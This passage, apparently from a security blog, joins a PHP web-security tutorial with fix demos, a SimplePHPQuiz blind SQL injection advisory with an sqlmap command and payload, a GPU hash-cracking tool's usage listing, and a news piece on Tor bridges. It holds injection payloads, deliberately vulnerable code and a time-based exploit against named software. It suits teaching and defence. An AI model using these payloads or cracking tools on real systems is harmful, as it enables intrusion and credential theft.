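    db.executemany("INSERT INTO auth (username, password) VALUES (?, ?)",
                   [("alice", "s3cret"), ("bob", "hunter2")])
    return db


def login_concat(db, username):
    """Mirrors the vulnerable PHP: the raw value becomes part of the SQL text."""
    query = "select * from auth where username = '" + username + "'"
    return db.execute(query).fetchall()


def escape_string(value):
    """Quote escaping as an escaping function does it (SQLite flavour)."""
    return value.replace("'", "''")


def login_escaped(db, username):
    """Escaping is enough here because the value sits inside quotes."""
    query = "select * from auth where username = '" + escape_string(username) + "'"
    return db.execute(query).fetchall()


def user_by_id_escaped(db, user_id):
    """Escaping does NOT help in a numeric context: there are no quotes to break out of."""
    query = "select * from auth where id = " + escape_string(user_id)
    return db.execute(query).fetchall()


def login_prepared(db, username):
    """Bound parameter: the value can never change the statement's structure."""
    return db.execute("select * from auth where username = ?", (username,)).fetchall()


def user_by_id_prepared(db, user_id):
    return db.execute("select * from auth where id = ?", (user_id,)).fetchall()


def demo():
    db = make_db()
    bypass = "' OR '1'='1"       # classic tautology payload for a quoted string
    numeric_bypass = "1 OR 1=1"  # same idea for an unquoted number
    return {
        "concat_rows": len(login_concat(db, bypass)),                   # 2: every row, "logged in"
        "escaped_rows": len(login_escaped(db, bypass)),                 # 0: quotes neutralised
        "numeric_escaped_rows": len(user_by_id_escaped(db, numeric_bypass)),  # 2: still injected
        "prepared_rows": len(login_prepared(db, bypass)),               # 0
        "numeric_prepared_rows": len(user_by_id_prepared(db, numeric_bypass)),  # 0
        "honest_login": len(login_prepared(db, "alice")),               # 1
    }


if __name__ == "__main__":
    print(demo())
```

The escaped string query survives the payload, but the escaped numeric query does not, which is why the bullet list above ranks type checks and bound parameters above escaping. A side note for anyone trying stacked queries (`'; DROP TABLE auth; --`) here: sqlite3's execute() refuses a second statement, just as mysqli_query() does, so that particular payload fails on both for a reason unrelated to escaping.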


2. XSS

XSS (Cross Site Scripting) is an attack in which a user submits data to your website that includes a client-side script (generally JavaScript). If you output this data on another web page without filtering it, the script is executed in other visitors' browsers.

Accepting text comments from a user:

    <?php
    if (file_exists('comments')) {
        $comments = file_get_contents('comments');
    } else {
        $comments = '';
    }

    if (isset($_POST['comment'])) {
        // stored exactly as submitted: no filtering, no encoding
        $comments .= '<br />' . $_POST['comment'];
        file_put_contents('comments', $comments);
    }
    ?>

Outputting the comments to (another) user:

    <form action='xss.php' method='POST'>
        Enter your comments here: <br />
        <textarea name='comment'></textarea> <br />
        <input type='submit' value='Post comment' />
    </form><hr /><br />

    <?php echo $comments; // echoed back unescaped: any <script> in a comment runs ?>

What can happen?

  • Annoying popups
  • Refresh or redirections
  • Corrupted pages or forms
  • Steal cookies
  • AJAX ( XMLHttpRequest )
Preventing XSS

To prevent XSS, encode everything you output to the browser with htmlentities() (or htmlspecialchars()) in PHP. Basic usage is simple, but there are many advanced options (character set, quote handling, double encoding); see the XSS cheat sheet for the cases a naive call misses.

3. Session fixation

Session security rests on the assumption that a PHPSESSID is hard to guess. However, PHP can accept a session ID either through a cookie or through the URL. An attacker who tricks a victim into using a specific (attacker-chosen) session ID, for instance through a phishing link that carries the ID, shares that session once the victim logs in.

(Image: a typical session fixation attack)

4. Session capturing and hijacking

It is the same idea as session fixation, but it involves stealing the session ID. If session IDs are stored in cookies, attackers can steal them through XSS and JavaScript. Session IDs can also be sniffed, or obtained from proxy servers if they are carried in the URL.

Preventing session capturing and hijacking

  • Regenerate IDs (session_regenerate_id()) after login and periodically, and accept IDs from cookies only (session.use_only_cookies=1)
  • If using sessions, always use SSL/TLS
5. Cross Site Request Forgeries (CSRF)

CSRF refers to a request for a page that looks as if it was initiated by one of the site's trusted users, but was not made deliberately by them. There are many variations. One example is an image tag on an attacker's page whose src points at a state-changing URL on your site, so that the victim's browser sends the request (with the victim's cookies) just by rendering the page:

<img src='...'>

Preventing Cross Site Request Forgeries

In general, make sure the requests come from your own forms, and that each form submission is matched to an individual form that you sent out. There are two rules to remember:

  • Use sessions with appropriate security measures, e.g. regenerate IDs and use SSL for every session.
  • Generate a one-time token, embed it in the form, save it in the session (as a session variable), and check it on submission.
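The session and CSRF rules above, implemented as an added example in Python rather than PHP (not code from the page): a session store that refuses IDs it did not issue (so a fixed ID planted in a URL is ignored), rotates the ID at login, and a single-use synchronizer token compared in constant time. The dict-backed store stands in for PHP's session handler; the user name and the "transfer" form are constructed.

```python
"""Server-side session handling that closes the three holes discussed above:
session IDs chosen by the client are refused (fixation), the ID is replaced
on login (so a stolen or fixed pre-login ID is worthless), and each form
carries a single-use synchronizer token checked in constant time (CSRF).
Added example, in Python rather than PHP and not code from the page; the
store is an in-memory dict standing in for PHP's session handler."""
import hmac
import secrets


class SessionStore:
    def __init__(self):
        self._sessions = {}  # id -> data dict; only IDs minted here are valid

    def _mint(self):
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = {}
        return sid

    def resolve(self, presented_id):
        """Return (sid, data). An unknown ID (e.g. one planted in a URL) is
        ignored and a fresh session is started instead."""
        if presented_id in self._sessions:
            return presented_id, self._sessions[presented_id]
        sid = self._mint()
        return sid, self._sessions[sid]

    def regenerate(self, sid):
        """Like session_regenerate_id(true): same data, new ID, old ID invalidated."""
        data = self._sessions.pop(sid)
        new_sid = secrets.token_urlsafe(32)
        self._sessions[new_sid] = data
        return new_sid

    def is_valid(self, sid):
        return sid in self._sessions


def login(store, sid, data, username):
    """Privilege changes: record the user, then rotate the session ID."""
    data["user"] = username
    return store.regenerate(sid)


def issue_csrf_token(data, form_name):
    """One token per form, stored in the session and embedded in the form."""
    token = secrets.token_hex(32)
    data.setdefault("csrf", {})[form_name] = token
    return token


def verify_csrf_token(data, form_name, submitted):
    """Single use: the stored token is removed whether or not the check passes."""
    expected = data.get("csrf", {}).pop(form_name, None)
    if expected is None or submitted is None:
        return False
    return hmac.compare_digest(expected, submitted)  # no early-exit string compare


def demo():
    store = SessionStore()
    # 1. Fixation attempt: the victim arrives with ?PHPSESSID=attacker-chosen
    sid, data = store.resolve("attacker-chosen")
    fixation_blocked = sid != "attacker-chosen"
    # 2. Login rotates the ID; the pre-login ID no longer works
    pre_login_sid = sid
    sid = login(store, sid, data, "alice")
    rotated = sid != pre_login_sid and not store.is_valid(pre_login_sid) and store.is_valid(sid)
    # 3. CSRF: a forged submission fails (and burns the token), a genuine one
    #    passes once, and replaying it fails
    issue_csrf_token(data, "transfer")
    forged = verify_csrf_token(data, "transfer", "0" * 64)
    token = issue_csrf_token(data, "transfer")  # form rendered again
    genuine = verify_csrf_token(data, "transfer", token)
    replay = verify_csrf_token(data, "transfer", token)
    return {"fixation_blocked": fixation_blocked, "rotated": rotated,
            "forged": forged, "genuine": genuine, "replay": replay}


if __name__ == "__main__":
    print(demo())
```

In PHP the equivalents are session.use_only_cookies plus session.use_strict_mode for the first point, session_regenerate_id(true) for the second, and hash_equals() for the token comparison.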
6. Code injection

Code injection is the exploitation of a bug caused by processing invalid data. The problem occurs when you unintentionally execute arbitrary code, typically through file inclusion: poorly written code can allow a remote file to be included and executed. Many PHP functions such as require accept a URL as well as a filename. Example:

    <form>Choose theme:
    <select name="theme">
    <option value="blue">Blue</option>
    <option value="green">Green</option>
    <option value="red">Red</option>
    </select>
    <input type="submit">
    </form>
    <?php
    // the original relied on register_globals to populate $theme from the request
    $theme = isset($_GET['theme']) ? $_GET['theme'] : '';
    if ($theme) {
        require($theme.'.txt');   // user-controlled path, local or remote
    }
    ?>

In the example above, passing user input as a filename, or as part of one, invites users to submit a value that starts with "http://" (so that require fetches and runs a file from their own server), or one containing "../" to include local files they should not be able to reach.

Prevent Code Injection

  • Filter user input; best of all, compare it against an allowlist of the theme names you actually ship
  • Disable allow_url_fopen and/or allow_url_include in php.ini. allow_url_include (off by default) governs require/include of remote files; allow_url_fopen governs fopen() and friends.
Other general principles
  • Don't rely on server configuration to protect you, especially if your web server/PHP is managed by your ISP, or if your web site might be migrated/deployed somewhere else in future. Embed the security-aware checking/logic in the website code (PHP, HTML, JavaScript, etc.)
  • Design your server-side scripts with security from the ground up: e.g., use a single line of execution that begins with a single point of authentication and data cleaning

    – E.g., delegate all login/security checking logic in one PHP function/file to be included in all security-sensitive pages

    – Problems can be easily checked and solved

  • Keep your code up to date.  Stay on top of patches and advisories

SimplePHPQuiz Blind SQL Injection

# Exploit Title: SimplePHPQuiz - Blind SQL Injection
# Date: 2016-08-23
# Exploit Author: HaHwul
# Exploit Author Blog:
# Vendor Homepage:
# Software Link:
# Version: Latest commit
# Tested on: Debian [wheezy]

### Vulnerability
1-1. Normal Request
POST /vul_test/SimplePHPQuiz/process_quizAdd.php HTTP/1.1
Content-Length: 96


1-2 Response
   <div class="container theme-showcase" role="main">Your quiz has been saved <div class="footer">
 	<p class="text-muted">&copy Val Okafor 2014 - Simple PHP Quiz</p>

2-1 Attack Request 1
POST /vul_test/SimplePHPQuiz/process_quizAdd.php HTTP/1.1
Content-Length: 96


2-2 Response
    <div class="container theme-showcase" role="main"><h1>System Error</h1> <div class="footer">
 	<p class="text-muted">&copy Val Okafor 2014 - Simple PHP Quiz</p>

3-1 Attack Request 2
POST /vul_test/SimplePHPQuiz/process_quizAdd.php HTTP/1.1
Content-Length: 96


3-2 Response
   <div class="container theme-showcase" role="main">Your quiz has been saved <div class="footer">
 	<p class="text-muted">&copy Val Okafor 2014 - Simple PHP Quiz</p>

### Weak Parameters
correct_answer parameter
question parameter
wrong_answer1 parameter
wrong_answer2 parameter
wrong_answer3 parameter

### SQLMAP Result
#> sqlm -u "" --data="question=0000&correct_answer=99aaa99&wrong_answer1=9&wrong_answer2=9&wrong_answer3=9&submit=submit" --risk 3 --dbs --no-cast -p correct_answer


POST parameter 'correct_answer' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
sqlmap identified the following injection points with a total of 117 HTTP(s) requests:
Parameter: correct_answer (POST)
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: question=0000&correct_answer=99aaa99' AND (SELECT * FROM (SELECT(SLEEP(5)))FvVg) AND 'ZQRo'='ZQRo&wrong_answer1=9&wrong_answer2=9&wrong_answer3=9&submit=submit
[17:52:05] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.10
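Why the time-based payload above works, and the fix, as an added example that is not SimplePHPQuiz’s own code: the table name, column names and the PDO setup are assumptions; only the POST parameter names and the payload come from the advisory (PHP 7.4+).

```php
<?php
// Added example, not SimplePHPQuiz's own code. Table "quiz" and its column
// names are assumptions; the parameter names are the advisory's.
$fields = ['question', 'correct_answer', 'wrong_answer1', 'wrong_answer2', 'wrong_answer3'];

// Vulnerable pattern: each value is spliced into the SQL text, so the single
// quote in the payload closes the literal and SLEEP(5) runs on the server.
// The 5-second delay (or the "System Error" page) is the blind oracle.
function build_insert_vulnerable(array $post, array $fields): string
{
    $values = array_map(fn($f) => "'" . ($post[$f] ?? '') . "'", $fields);
    return 'INSERT INTO quiz (' . implode(', ', $fields) . ') VALUES ('
        . implode(', ', $values) . ')';
}

// Fixed: the SQL text carries only placeholders; values are bound separately
// and are never parsed as SQL, whatever characters they contain.
function insert_quiz(PDO $db, array $post, array $fields): bool
{
    foreach ($fields as $f) {
        if (!isset($post[$f]) || $post[$f] === '' || strlen($post[$f]) > 500) {
            return false;   // reject incomplete or oversized input up front
        }
    }
    $placeholders = implode(', ', array_fill(0, count($fields), '?'));
    $sql = 'INSERT INTO quiz (' . implode(', ', $fields) . ') VALUES (' . $placeholders . ')';
    $stmt = $db->prepare($sql);
    return $stmt->execute(array_map(fn($f) => $post[$f], $fields));
}

// Constructed input: the advisory's sqlmap payload in correct_answer.
$post = [
    'question'       => '0000',
    'correct_answer' => "99aaa99' AND (SELECT * FROM (SELECT(SLEEP(5)))FvVg) AND 'ZQRo'='ZQRo",
    'wrong_answer1'  => '9', 'wrong_answer2' => '9', 'wrong_answer3' => '9',
];
echo build_insert_vulnerable($post, $fields), "\n";   // SLEEP(5) lands inside the statement

// With the fixed version the same value is stored as a plain string.
// Disable emulated prepares so MySQL itself separates SQL from data.
// $db = new PDO('mysql:host=localhost;dbname=quiz', $user, $pass,
//     [PDO::ATTR_EMULATE_PREPARES => false, PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
// insert_quiz($db, $post, $fields);
```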


IGHASHGPU – GPU Based Hash Cracking – SHA1, MD5 & MD4

IGHASHGPU is an efficient and comprehensive command line GPU based hash cracking program that enables you to retrieve SHA1, MD5 and MD4 hashes by utilising ATI and nVidia GPUs.


It even works with salted hashes, making it useful for MS-SQL, Oracle 11g, NTLM passwords and others that use salts.

IGHASHGPU is meant to function with ATI RV 7X0 and 8X0 cards, as well as any nVidia CUDA video card, with speed varying according to the user’s GPU. The program also features a ‘-cpudontcare’ switch that tells IGHASHGPU to get the maximum out of the GPU without any particular regard for CPU usage.

At the same time, you can set a temperature threshold for hardware monitoring (‘-hm’), so that the program stops when your hardware goes over the permitted value (the default is 90 degrees Celsius).

It also has a feature that lets you set the block size so as to adjust the video response time and reduce any possible lag; if, on the other hand, this is not something that bothers you, you can input a higher value (IGHASHGPU supports block sizes between 16 and 23).

Hashes Supported for Cracking

As IGHASHGPU supports salted hashes it’s possible to use it for:

  • Plain MD4, MD5, SHA1.
  • NTLM
  • Domain Cached Credentials
  • Oracle 11g
  • MySQL5
  • vBulletin
  • Invision Power Board


Supported Cards/Requirements

  • Only currently supported ATI cards are:
    • HD RV7X0
    • RV830/870
    • 4550
    • 4670
    • 4830
    • 4730
    • 4770
    • 4850
    • 4870
    • 4890
    • 5750
    • 5770
    • 5850
    • 5870
  • Catalyst 9.9+ must be installed.
  • Only supported nVidia cards are the ones with CUDA support, i.e. G80+.
  • Systems with multiple GPUs supported.

    ighashgpu.exe [switch:param] [hashfile.txt]
    -c           csdepa     Charset definition (caps, smalls (default), digits, special, space, all)
    -u           [chars]    User-defined characters
    -uh          [HEX]      User-defined characters in HEX (2 chars each)
    -uhh         [HEX]      User-defined characters in Unicode HEX (4 chars each)
    -uf          [filename] Load characters from file. Not used with Unicode.
    -sf          [password] Password to start attack from
    -m           [mask]     Password mask
    -ms          [symbol]   Mask symbol
    -salt        [hex]      Append salt after password
    -asalt       [string]   Append salt in ascii after password
    -usalt       [string]   Append salt in unicode after password
    -ulsalt      [string]   Same as above but unicode string firstly transformed to lower case
    -min         [value]    Minimum length (default == 4), must be >= 4
    -max         [value]    Maximum length (default == 6), must be <= 31 (not counting salt length)
    -h           [hash]     Hash to attack (16 or 20 bytes in HEX)
    -t           [type]     Type of hash to attack
    -devicemask:[N]         Bit mask for GPUs usage, bit 0 == first GPU (default 0xFF, i.e. all GPUs).
    -cpudontcare            Tell ighashgpu that you want maximum from GPU and so don't care about CPU usage at all (and it means one CPU core at 100% per one GPU).
    -hm          [N]        Set threshold temperature for hardware monitoring, default is 90C. You can disable monitoring by setting this value to zero.
    -blocksize   [N]        Set block size, by default N = 23 which means 2^23 = 8388608 passwords offloaded to GPU in a single batch.

    By default charset processed as ANSI one (i.e. WideCharToMultiByte(CP_ACP, ...)). You can change this with:
    -unicode                Use unicode
    -oem                    Use oem encoding
    -codepage    [page]     Convert charset to specific codepage (need to have it at system of course)

You can download IGHASHGPU here:

How to access Tor, even when your country says you can’t

Censorship is nothing new, but as many governments and law enforcement agencies tighten the noose, anti-surveillance solutions need to get creative.

The Tor Project, which runs the anti-surveillance Tor network, is one such organization.

The non-profit runs a network designed to disguise the original locations of users through traffic and relay points, and is often used by journalists, activists, and those attempting to circumvent censorship.

Nima Fatemi, an independent security researcher and member of the Tor Project, highlighted in a recent blog post how users in countries such as China, Saudi Arabia, and Iran can still try to access the network.

As noted by Motherboard, governments including Saudi Arabia, Bahrain, Iran, Russia, and China often attempt to block the use of virtual private networks (VPNs) in an effort to keep an eye on their citizens’ online activities.

However, blocking Tor is a more complicated problem because of the volunteer-run nodes and relays used to reroute traffic and disguise original IP addresses.

According to Fatemi, the Tor Browser spoofs the UserAgent identity feature to make users look alike and avoid spying, as well as fingerprint attacks. However, Tor is still an open network where anyone can get a list of relay points — and so governments can simply block them.

“They can simply get the list of Tor relays and block them,” Fatemi noted. “This bars millions of people from access to free information, often including those who need it most. We at Tor care about freedom of access to information and strongly oppose censorship.”

As a result, Tor has developed what the organization called Pluggable Transports (PTs). PTs are a type of “bridge” into the Tor network which “make encrypted traffic to Tor look like not-interesting or garbage traffic,” according to the developer.

If users already want to try out this censorship-thwarting tool, they are in luck — as PTs are already included in the Tor Browser.

Tor has provided a step-by-step guide, as shown in the image below:


If you need additional bridges, you can email the project here or visit the BridgeDB website.


Tor has hit the spotlight recently after a scandal involving one of the “core” members of the project’s development team rocked the very foundations of the organization. Jacob Appelbaum, a 33-year-old developer, stepped down from his position after being accused of alleged inappropriate sexual misconduct.

While Appelbaum has denied the claim as a “calculated and targeted attack,” an investigation conducted by an external law firm found that “many people inside and outside the Tor Project have reported incidents of being humiliated, intimidated, bullied, and frightened by Jacob,” according to Tor executive director Shari Steele.

As a result of the scandal, the full Tor board has been replaced with new faces including security expert Bruce Schneier, executive director of the Electronic Frontier Foundation (EFF) Cindy Cohn, and Matt Blaze, a computer and information science professor at the University of Pennsylvania.